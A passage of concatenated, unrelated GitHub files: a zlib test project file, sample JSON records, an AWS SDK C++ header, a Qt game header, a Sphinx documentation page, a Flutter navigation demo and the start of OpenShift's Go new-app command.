Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" /> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'" /> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" /> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|x64'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|x64'" /> </PropertyGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <ClCompile> <Optimization>Disabled</Optimization> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>WIN32;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> <MinimalRebuild>true</MinimalRebuild> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>x86\ZlibDllDebug\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> 
<ProgramDatabaseFile>$(OutDir)testzlib.pdb</ProgramDatabaseFile> <SubSystem>Console</SubSystem> <RandomizedBaseAddress>false</RandomizedBaseAddress> <DataExecutionPrevention> </DataExecutionPrevention> <TargetMachine>MachineX86</TargetMachine> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ClCompile> <Optimization>MaxSpeed</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <OmitFramePointers>true</OmitFramePointers> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>WIN32;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> <StringPooling>true</StringPooling> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <FunctionLevelLinking>true</FunctionLevelLinking> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>x86\ZlibDllRelease\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <SubSystem>Console</SubSystem> <OptimizeReferences>true</OptimizeReferences> <EnableCOMDATFolding>true</EnableCOMDATFolding> <RandomizedBaseAddress>false</RandomizedBaseAddress> <DataExecutionPrevention> </DataExecutionPrevention> <TargetMachine>MachineX86</TargetMachine> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <Midl> <TargetEnvironment>X64</TargetEnvironment> </Midl> <ClCompile> <Optimization>Disabled</Optimization> 
<AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;_DEBUG;_CONSOLE;WIN64;%(PreprocessorDefinitions)</PreprocessorDefinitions> <MinimalRebuild>true</MinimalRebuild> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>x64\ZlibDllDebug\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <ProgramDatabaseFile>$(OutDir)testzlib.pdb</ProgramDatabaseFile> <SubSystem>Console</SubSystem> <TargetMachine>MachineX64</TargetMachine> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'"> <Midl> <TargetEnvironment>Itanium</TargetEnvironment> </Midl> <ClCompile> <Optimization>Disabled</Optimization> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;_DEBUG;_CONSOLE;WIN64;%(PreprocessorDefinitions)</PreprocessorDefinitions> <MinimalRebuild>true</MinimalRebuild> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> 
<AdditionalDependencies>ia64\ZlibDllDebug\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <ProgramDatabaseFile>$(OutDir)testzlib.pdb</ProgramDatabaseFile> <SubSystem>Console</SubSystem> <TargetMachine>MachineIA64</TargetMachine> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <Midl> <TargetEnvironment>X64</TargetEnvironment> </Midl> <ClCompile> <Optimization>MaxSpeed</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <OmitFramePointers>true</OmitFramePointers> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;NDEBUG;_CONSOLE;WIN64;%(PreprocessorDefinitions)</PreprocessorDefinitions> <StringPooling>true</StringPooling> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <FunctionLevelLinking>true</FunctionLevelLinking> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>x64\ZlibDllRelease\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <SubSystem>Console</SubSystem> <OptimizeReferences>true</OptimizeReferences> <EnableCOMDATFolding>true</EnableCOMDATFolding> <TargetMachine>MachineX64</TargetMachine> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'"> <Midl> <TargetEnvironment>Itanium</TargetEnvironment> </Midl> <ClCompile> 
<Optimization>MaxSpeed</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <OmitFramePointers>true</OmitFramePointers> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;NDEBUG;_CONSOLE;WIN64;%(PreprocessorDefinitions)</PreprocessorDefinitions> <StringPooling>true</StringPooling> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <FunctionLevelLinking>true</FunctionLevelLinking> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>ia64\ZlibDllRelease\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <SubSystem>Console</SubSystem> <OptimizeReferences>true</OptimizeReferences> <EnableCOMDATFolding>true</EnableCOMDATFolding> <TargetMachine>MachineIA64</TargetMachine> </Link> </ItemDefinitionGroup> <ItemGroup> <ClCompile Include="..\..\testzlib\testzlib.c" /> </ItemGroup> <ItemGroup> <ProjectReference Include="zlibvc.vcxproj"> <Project>{8fd826f8-3739-44e6-8cc8-997122e53b8d}</Project> </ProjectReference> </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> </ImportGroup> </Project>
{ "pile_set_name": "Github" }
[ { "Id": "3e399241", "IdLineage": [ "sfdsfdsfs", "sdfdsfdsf" ], "Individuals": [ { "Id": "1232112", "IdLineage": [ "fdsfsd1" ], "Events": [ { "RecordId": "2132121321", "RecordType": "SALE", "EventDate": "2016-01-04T05:00:00Z" }, { "RecordId": "123213212", "RecordType": "SALE", "EventDate": "2012-07-16T04:00:00Z" } ] }, { "Id": "ssf2112", "IdLineage": [], "Events": [ { "RecordId": "123213ds21", "RecordType": "ACXIOMRECORD", "EventDate": "2017-12-17T03:33:54.875Z" } ] }, { "Id": "asadsad", "IdLineage": [], "Events": [ { "RecordId": "213213sa21", "RecordType": "SALE", "EventDate": "2018-03-09T05:00:00Z" } ] } ] } ]
{ "pile_set_name": "Github" }
/**
 * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
 * SPDX-License-Identifier: Apache-2.0.
 */

#pragma once
#include <aws/route53domains/Route53Domains_EXPORTS.h>
#include <aws/route53domains/Route53DomainsRequest.h>
#include <aws/core/utils/memory/stl/AWSString.h>
#include <utility>

namespace Aws
{
namespace Route53Domains
{
namespace Model
{

  /**
   * Request model for the Route 53 Domains GetOperationDetail API call.
   *
   * <p>The <a
   * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_GetOperationDetail.html">GetOperationDetail</a>
   * request includes the following element.</p><p><h3>See Also:</h3>   <a
   * href="http://docs.aws.amazon.com/goto/WebAPI/route53domains-2014-05-15/GetOperationDetailRequest">AWS
   * API Reference</a></p>
   */
  class AWS_ROUTE53DOMAINS_API GetOperationDetailRequest : public Route53DomainsRequest
  {
  public:
    GetOperationDetailRequest();

    // Service request name is the Operation name which will send this request out,
    // each operation should has unique request name, so that we can get operation's name from this request.
    // Note: this is not true for response, multiple operations may have the same response name,
    // so we can not get operation's name from response.
    inline virtual const char* GetServiceRequestName() const override { return "GetOperationDetail"; }

    // Serializes the set members into the payload sent to the service.
    Aws::String SerializePayload() const override;

    // HTTP headers specific to this operation.
    Aws::Http::HeaderValueCollection GetRequestSpecificHeaders() const override;


    /**
     * <p>The identifier for the operation for which you want to get the status. Route
     * 53 returned the identifier in the response to the original request.</p>
     */
    inline const Aws::String& GetOperationId() const{ return m_operationId; }

    /**
     * True once the operation identifier has been set via any SetOperationId /
     * WithOperationId overload.
     */
    inline bool OperationIdHasBeenSet() const { return m_operationIdHasBeenSet; }

    /**
     * Sets the operation identifier (copy) and marks it as set.
     */
    inline void SetOperationId(const Aws::String& value) { m_operationIdHasBeenSet = true; m_operationId = value; }

    /**
     * Sets the operation identifier (move) and marks it as set.
     */
    inline void SetOperationId(Aws::String&& value) { m_operationIdHasBeenSet = true; m_operationId = std::move(value); }

    /**
     * Sets the operation identifier from a C string and marks it as set.
     */
    inline void SetOperationId(const char* value) { m_operationIdHasBeenSet = true; m_operationId.assign(value); }

    /**
     * Fluent setter: sets the operation identifier (copy) and returns *this.
     */
    inline GetOperationDetailRequest& WithOperationId(const Aws::String& value) { SetOperationId(value); return *this;}

    /**
     * Fluent setter: sets the operation identifier (move) and returns *this.
     */
    inline GetOperationDetailRequest& WithOperationId(Aws::String&& value) { SetOperationId(std::move(value)); return *this;}

    /**
     * Fluent setter: sets the operation identifier (C string) and returns *this.
     */
    inline GetOperationDetailRequest& WithOperationId(const char* value) { SetOperationId(value); return *this;}

  private:

    Aws::String m_operationId;     // operation identifier returned by the original request
    bool m_operationIdHasBeenSet;  // tracks whether OperationId was explicitly set
  };

} // namespace Model
} // namespace Route53Domains
} // namespace Aws
{ "pile_set_name": "Github" }
#pragma once #include <unordered_map> #include <vector> #include "View2.h" #include <QMap> #include <QMutex> #include <QKeyEvent> #include <QElapsedTimer> #include "Sound.h" #include <CoreInterface.h> class Representation : public QObject { Q_OBJECT public: Representation(QObject* parent = nullptr); struct Performance { QElapsedTimer timer; qint64 mutex_ns; }; const Performance& GetPerformance() { return performance_; } void ResetPerformance(); kv::GrowingFrame GetGrowingFrame() const { return kv::GrowingFrame(new_frame_); } void Swap(); void Process(); void Click(int x, int y); void HandleKeyboardDown(QKeyEvent* event); void HandleKeyboardUp(QKeyEvent* event); void ResetKeysState(); void HandleInput(); SoundPlayer& GetSoundPlayer() { return player_; } signals: void chatMessage(const QString& html); void systemText(const QString& tab, const QString& text); void clearSystemTexts(); void removeEmptyTabs(); private: QMap<Qt::Key, bool> keys_state_; Performance performance_; QElapsedTimer autoplay_timer_; bool autoplay_; QElapsedTimer message_sending_interval_; QMutex mutex_; void SynchronizeViews(); void PerformPixelMovement(); void Draw(); void DrawInterface(); QElapsedTimer pixel_movement_tick_; quint32 current_frame_id_; bool is_updated_; using DataType = kv::FrameData; DataType* old_frame_; DataType* new_frame_; DataType first_data_; DataType second_data_; DataType current_frame_; struct ViewWithFrameId { View2 view; quint32 frame_id; }; std::unordered_map<quint32, ViewWithFrameId> views_; QVector<View2> interface_views_; class Camera { public: Camera(); void SetPos(int new_pos_x, int new_pos_y); void PerformPixelMovement(); int GetFullShiftX(); int GetFullShiftY(); private: int pos_x; int pos_y; int pixel_shift_x_; int pixel_shift_y_; } camera_; SoundPlayer player_; };
{ "pile_set_name": "Github" }
<!DOCTYPE html> <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]--> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>supplychainpy.bot package &mdash; supplychainpy 0.0.4 documentation</title> <link rel="stylesheet" href="_static/css/theme.css" type="text/css" /> <link rel="index" title="Index" href="genindex.html"/> <link rel="search" title="Search" href="search.html"/> <link rel="top" title="supplychainpy 0.0.4 documentation" href="index.html"/> <script src="_static/js/modernizr.min.js"></script> </head> <body class="wy-body-for-nav" role="document"> <div class="wy-grid-for-nav"> <nav data-toggle="wy-nav-shift" class="wy-nav-side"> <div class="wy-side-scroll"> <div class="wy-side-nav-search"> <a href="index.html" class="icon icon-home"> supplychainpy </a> <div class="version"> 0.0.4 </div> <div role="search"> <form id="rtd-search-form" class="wy-form" action="search.html" method="get"> <input type="text" name="q" placeholder="Search docs" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation"> <ul> <li class="toctree-l1"><a class="reference internal" href="changelog.html">Change Log</a></li> <li class="toctree-l1"><a class="reference internal" href="installation.html">Installation</a></li> <li class="toctree-l1"><a class="reference internal" href="quickstart.html">Quick Guide</a></li> <li class="toctree-l1"><a class="reference internal" href="reporting.html">Supplychainpy Reporting Suite</a></li> <li class="toctree-l1"><a class="reference internal" href="inventory.html">Inventory Modeling and Analysis Made Easy with Supplychainpy</a></li> <li class="toctree-l1"><a class="reference internal" href="pandas.html">Using supplychainpy with Pandas, 
Jupyter and Matplotlib</a></li> <li class="toctree-l1"><a class="reference internal" href="ahp.html">Analytic Hierarchy Process</a></li> <li class="toctree-l1"><a class="reference internal" href="monte_carlo_simulation.html">Monte Carlo Simulation</a></li> <li class="toctree-l1"><a class="reference internal" href="docker.html">Supplychainpy with Docker</a></li> <li class="toctree-l1"><a class="reference internal" href="calculations.html">Formulas and Equations</a></li> </ul> </div> </div> </nav> <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"> <nav class="wy-nav-top" role="navigation" aria-label="top navigation"> <i data-toggle="wy-nav-top" class="fa fa-bars"></i> <a href="index.html">supplychainpy</a> </nav> <div class="wy-nav-content"> <div class="rst-content"> <div role="navigation" aria-label="breadcrumbs navigation"> <ul class="wy-breadcrumbs"> <li><a href="index.html">Docs</a> &raquo;</li> <li>supplychainpy.bot package</li> <li class="wy-breadcrumbs-aside"> <a href="_sources/supplychainpy.bot.rst.txt" rel="nofollow"> View page source</a> </li> </ul> <hr/> </div> <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article"> <div itemprop="articleBody"> <div class="section" id="supplychainpy-bot-package"> <h1>supplychainpy.bot package<a class="headerlink" href="#supplychainpy-bot-package" title="Permalink to this headline">¶</a></h1> <div class="section" id="submodules"> <h2>Submodules<a class="headerlink" href="#submodules" title="Permalink to this headline">¶</a></h2> </div> <div class="section" id="module-supplychainpy.bot.dash"> <span id="supplychainpy-bot-dash-module"></span><h2>supplychainpy.bot.dash module<a class="headerlink" href="#module-supplychainpy.bot.dash" title="Permalink to this headline">¶</a></h2> <dl class="class"> <dt id="supplychainpy.bot.dash.ChatBot"> <em class="property">class </em><code class="descclassname">supplychainpy.bot.dash.</code><code class="descname">ChatBot</code><a 
class="headerlink" href="#supplychainpy.bot.dash.ChatBot" title="Permalink to this definition">¶</a></dt> <dd><p>Bases: <code class="xref py py-class docutils literal"><span class="pre">object</span></code></p> <p>Chat Bot for supplychainpy Reporting.</p> <dl class="staticmethod"> <dt id="supplychainpy.bot.dash.ChatBot.chat_machine"> <em class="property">static </em><code class="descname">chat_machine</code><span class="sig-paren">(</span><em>message: str</em><span class="sig-paren">)</span> &#x2192; typing.List[str]<a class="headerlink" href="#supplychainpy.bot.dash.ChatBot.chat_machine" title="Permalink to this definition">¶</a></dt> <dd><p>Interact with chat bot my sending a message and waiting for a response. :param message: The message for the chat bot. :type message: str</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field-odd field"><th class="field-name">Returns:</th><td class="field-body">The response from the chat bot.</td> </tr> <tr class="field-even field"><th class="field-name">Return type:</th><td class="field-body">list</td> </tr> </tbody> </table> <p>Examples: &gt;&gt;&gt; chat_bot = ChatBot() &gt;&gt;&gt; response = chat_bot.chat_machine(message=’hello’)</p> </dd></dl> </dd></dl> </div> <div class="section" id="module-supplychainpy.bot"> <span id="module-contents"></span><h2>Module contents<a class="headerlink" href="#module-supplychainpy.bot" title="Permalink to this headline">¶</a></h2> </div> </div> </div> <div class="articleComments"> </div> </div> <footer> <hr/> <div role="contentinfo"> <p> &copy; Copyright 2016, Kevin Fasusi. </p> </div> Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/snide/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. 
</footer> </div> </div> </section> </div> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT:'./', VERSION:'0.0.4', COLLAPSE_INDEX:false, FILE_SUFFIX:'.html', HAS_SOURCE: true, SOURCELINK_SUFFIX: '.txt' }; </script> <script type="text/javascript" src="_static/jquery.js"></script> <script type="text/javascript" src="_static/underscore.js"></script> <script type="text/javascript" src="_static/doctools.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script> <script type="text/javascript" src="_static/js/theme.js"></script> <script type="text/javascript"> jQuery(function () { SphinxRtdTheme.StickyNav.enable(); }); </script> </body> </html>
{ "pile_set_name": "Github" }
import 'package:flutter/cupertino.dart';
import 'package:flutter/material.dart';

void main() {
  runApp(new IntegrationApp());
}

/// Demo app exercising navigation between Material and Cupertino pages,
/// including pages that deliberately mix widgets from both design languages.
class IntegrationApp extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return new MaterialApp(
      home: new MaterialPage(),
    );
  }
}

/// Pure Material page: Scaffold + AppBar, with a button that pushes the
/// Cupertino page using an iOS-style [CupertinoPageRoute] transition.
class MaterialPage extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return new Scaffold(
      appBar: new AppBar(
        title: const Text('Material Page'),
      ),
      body: new Center(
        child: new RaisedButton(
          child: const Text('Cupertino Page'),
          onPressed: () {
            Navigator.push(context, new CupertinoPageRoute(
                builder: (BuildContext context) => new CupertinoPage()
            ));
          },
        )
      ),
    );
  }
}

/// Pure Cupertino page: CupertinoPageScaffold + navigation bar, with a button
/// that pushes the first mixed page using a Material [MaterialPageRoute].
class CupertinoPage extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return new CupertinoPageScaffold(
      navigationBar: const CupertinoNavigationBar(
        middle: const Text('Cupertino Page'),
      ),
      child: new Center(
        child: new CupertinoButton(
          color: CupertinoColors.activeBlue,
          child: const Text('Mixed Page 1'),
          onPressed: () {
            Navigator.push(context, new MaterialPageRoute(
                builder: (BuildContext context) => new MixedPage1()
            ));
          }
        ),
      ),
    );
  }
}

/// Cupertino widgets hosted inside a Material [Scaffold]: a
/// CupertinoNavigationBar as the app bar and a CupertinoTabBar as the
/// bottom navigation bar.
class MixedPage1 extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return new Scaffold(
      appBar: new CupertinoNavigationBar(
        middle: const Text('Cupertino in Material'),
        // Material button
        trailing: new IconButton(
          icon: new Icon(Icons.search),
          onPressed: () {},
        ),
        backgroundColor: const Color(0xFFF8F8F8),
      ),
      // No automatic tab switching without CupertinoTabScaffold of course.
      bottomNavigationBar: new CupertinoTabBar(
        items: <BottomNavigationBarItem>[
          const BottomNavigationBarItem(
            icon: const Icon(CupertinoIcons.info),
            title: const Text('Item 1'),
          ),
          const BottomNavigationBarItem(
            icon: const Icon(CupertinoIcons.conversation_bubble),
            title: const Text('Item 2'),
          ),
        ],
      ),
      body: new Center(
        child: new CupertinoButton(
          color: CupertinoColors.activeBlue,
          child: const Text('Mixed Page 2'),
          onPressed: () {
            Navigator.push(context, new CupertinoPageRoute(
                builder: (BuildContext context) => new MixedPage2()
            ));
          },
        )
      ),
    );
  }
}

/// Material widgets hosted inside a [CupertinoPageScaffold]: a Material
/// AppBar as the navigation bar with a CupertinoButton action.
class MixedPage2 extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return new CupertinoPageScaffold(
      navigationBar: new AppBar(
        title: const Text('Material in Cupertino'),
        actions: <Widget>[
          new CupertinoButton(
            child: const Icon(CupertinoIcons.search),
            onPressed: () {},
          ),
        ],
      ),
      child: new Center(
        child: const Text(
          'The end',
          style: const TextStyle(
            fontSize: 36.0,
            color: Colors.black,
            // Outside a Material/DefaultTextStyle ancestor, text defaults to
            // an underline; explicitly disable it.
            decoration: TextDecoration.none,
          ),
        ),
      ),
    );
  }
}
{ "pile_set_name": "Github" }
package cmd

import (
	"bytes"
	"fmt"
	"io"
	"io/ioutil"
	"os"
	"sort"
	"strings"
	"time"

	"github.com/MakeNowJust/heredoc"
	docker "github.com/fsouza/go-dockerclient"
	"github.com/golang/glog"
	"github.com/spf13/cobra"

	kapi "k8s.io/kubernetes/pkg/api"
	kapierrors "k8s.io/kubernetes/pkg/api/errors"
	"k8s.io/kubernetes/pkg/client/restclient"
	kclient "k8s.io/kubernetes/pkg/client/unversioned"
	ctl "k8s.io/kubernetes/pkg/kubectl"
	kcmd "k8s.io/kubernetes/pkg/kubectl/cmd"
	kcmdutil "k8s.io/kubernetes/pkg/kubectl/cmd/util"
	"k8s.io/kubernetes/pkg/kubectl/resource"
	"k8s.io/kubernetes/pkg/runtime"
	"k8s.io/kubernetes/pkg/util/errors"
	"k8s.io/kubernetes/pkg/util/sets"
	"k8s.io/kubernetes/pkg/util/wait"

	buildapi "github.com/openshift/origin/pkg/build/api"
	cmdutil "github.com/openshift/origin/pkg/cmd/util"
	"github.com/openshift/origin/pkg/cmd/util/clientcmd"
	dockerutil "github.com/openshift/origin/pkg/cmd/util/docker"
	configcmd "github.com/openshift/origin/pkg/config/cmd"
	newapp "github.com/openshift/origin/pkg/generate/app"
	newcmd "github.com/openshift/origin/pkg/generate/app/cmd"
	"github.com/openshift/origin/pkg/generate/git"
	imageapi "github.com/openshift/origin/pkg/image/api"
	"github.com/openshift/origin/pkg/util"
)

// usage is implemented by errors that can render a command-specific
// usage hint for the given command name.
type usage interface {
	UsageError(commandName string) string
}

const (
	// newAppLong is the long-form help for the new-app command.
	newAppLong = `
Create a new application by specifying source code, templates, and/or images

This command will try to build up the components of an application using images, templates,
or code that has a public repository. It will lookup the images on the local Docker installation
(if available), a Docker registry, an integrated image stream, or stored templates.

If you specify a source code URL, it will set up a build that takes your source code and converts
it into an image that can run inside of a pod. Local source must be in a git repository that has a
remote repository that the server can see.

The images will be deployed via a deployment configuration, and a service will be connected to
the first public port of the app. You may either specify components using the various existing flags
or let new-app autodetect what kind of components you have provided.

If you provide source code, a new build will be automatically triggered.
You can use '%[1]s status' to check the progress.`

	// newAppExample shows representative invocations; %[1]s is the CLI name.
	newAppExample = `
  # List all local templates and image streams that can be used to create an app
  %[1]s new-app --list

  # Create an application based on the source code in the current git repository (with a public remote)
  # and a Docker image
  %[1]s new-app . --docker-image=repo/langimage

  # Create a Ruby application based on the provided [image]~[source code] combination
  %[1]s new-app centos/ruby-22-centos7~https://github.com/openshift/ruby-ex.git

  # Use the public Docker Hub MySQL image to create an app. Generated artifacts will be labeled with db=mysql
  %[1]s new-app mysql MYSQL_USER=user MYSQL_PASSWORD=pass MYSQL_DATABASE=testdb -l db=mysql

  # Use a MySQL image in a private registry to create an app and override application artifacts' names
  %[1]s new-app --docker-image=myregistry.com/mycompany/mysql --name=private

  # Create an application from a remote repository using its beta4 branch
  %[1]s new-app https://github.com/openshift/ruby-hello-world#beta4

  # Create an application based on a stored template, explicitly setting a parameter value
  %[1]s new-app --template=ruby-helloworld-sample --param=MYSQL_USER=admin

  # Create an application from a remote repository and specify a context directory
  %[1]s new-app https://github.com/youruser/yourgitrepo --context-dir=src/build

  # Create an application based on a template file, explicitly setting a parameter value
  %[1]s new-app --file=./example/myapp/template.json --param=MYSQL_USER=admin

  # Search all templates, image streams, and Docker images for the ones that match "ruby"
  %[1]s new-app --search ruby

  # Search for "ruby", but only in stored templates (--template, --image-stream and --docker-image
  # can be used to filter search results)
  %[1]s new-app --search --template=ruby

  # Search for "ruby" in stored templates and print the output as an YAML
  %[1]s new-app --search --template=ruby --output=yaml`

	// newAppNoInput is printed when the user supplied no components at all.
	newAppNoInput = `You must specify one or more images, image streams, templates, or source code locations to create an application.

To list all local templates and image streams, use:

  %[1]s new-app -L

To search templates, image streams, and Docker images that match the arguments provided, use:

  %[1]s new-app -S php
  %[1]s new-app -S --template=ruby
  %[1]s new-app -S --image-stream=mysql
  %[1]s new-app -S --docker-image=python
`
)

// NewAppOptions carries the resolved configuration and output plumbing for
// one invocation of the new-app command.
type NewAppOptions struct {
	Action configcmd.BulkAction // bulk create/dry-run behavior

	Config *newcmd.AppConfig // component/source/template configuration

	CommandPath string // full cobra command path, used in error hints
	CommandName string // CLI binary name, used in user-facing messages

	Out, ErrOut io.Writer
	Output      string
	PrintObject func(obj runtime.Object) error // versioned object printer
	LogsForObject LogsForObjectFunc            // used to follow installer pod logs
}

// NewCmdNewApplication implements the OpenShift cli new-app command
func NewCmdNewApplication(commandName string, f *clientcmd.Factory, out io.Writer) *cobra.Command {
	config := newcmd.NewAppConfig()
	config.Deploy = true
	options := &NewAppOptions{Config: config}

	cmd := &cobra.Command{
		Use:        "new-app (IMAGE | IMAGESTREAM | TEMPLATE | PATH | URL ...)",
		Short:      "Create a new application",
		Long:       fmt.Sprintf(newAppLong, commandName),
		Example:    fmt.Sprintf(newAppExample, commandName),
		SuggestFor: []string{"app", "application"},
		Run: func(c *cobra.Command, args []string) {
			kcmdutil.CheckErr(options.Complete(commandName, f, c, args, out))
			err := options.Run()
			// ErrExit signals "already reported"; exit non-zero without re-printing.
			if err == cmdutil.ErrExit {
